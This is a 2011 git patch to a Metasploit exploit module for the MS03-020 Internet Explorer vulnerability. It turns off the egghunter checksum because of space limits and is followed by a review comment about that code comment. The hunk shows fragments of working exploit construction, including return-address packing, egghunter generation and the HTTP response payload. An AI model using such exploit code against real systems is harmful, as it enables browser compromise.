From 6345fec06cd977e9964c508a32d97ebaed669b8e Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Wed, 18 May 2011 19:48:06 +0000
Subject: [PATCH] checksum support for egghunter disabled, because not enough room for it. See r4552.
git-svn-id: file:///home/svn/framework3/trunk@12656 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/browser/ms03_020_ie_objecttype.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb
index da6b0d1392..75b7f129d3 100644
--- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb
+++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb
@@ -96,7 +96,10 @@ class Metasploit3 < Msf::Exploit::Remote
 # Pack the values
 ret = [ ret ].pack('V')
 clean = [ clean ].pack('V')
- hunter = generate_egghunter(p.encoded, payload_badchars, { :checksum => true })
+
+ #checksum is disabled because it is 54 bytes big, and we have only 40 bytes of room
+ #to fit the egghunter.
+ hunter = generate_egghunter(p.encoded, payload_badchars, { :checksum => false })
 egg = hunter[1]
 # Now, build out the HTTP response payload
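Review bot: The comment added above the `generate_egghunter` call quotes two sizes (54 bytes and 40 bytes of room) that nothing in the visible code defines or checks, so it will go stale silently if either changes. It also drops the space after `#` that the surrounding comments (`# Pack the values`) use. I would carry the commit message's revision reference into the comment and match the file's spacing, e.g. `# Checksum disabled: the checksum variant (54 bytes) does not fit in the 40 bytes available for the hunter here. See r4552.` Whether `false` is already the default for `:checksum` is not visible in this hunk; keeping the option explicit is reasonable either way because it records the intent. The enclosing method starts and ends outside the hunk.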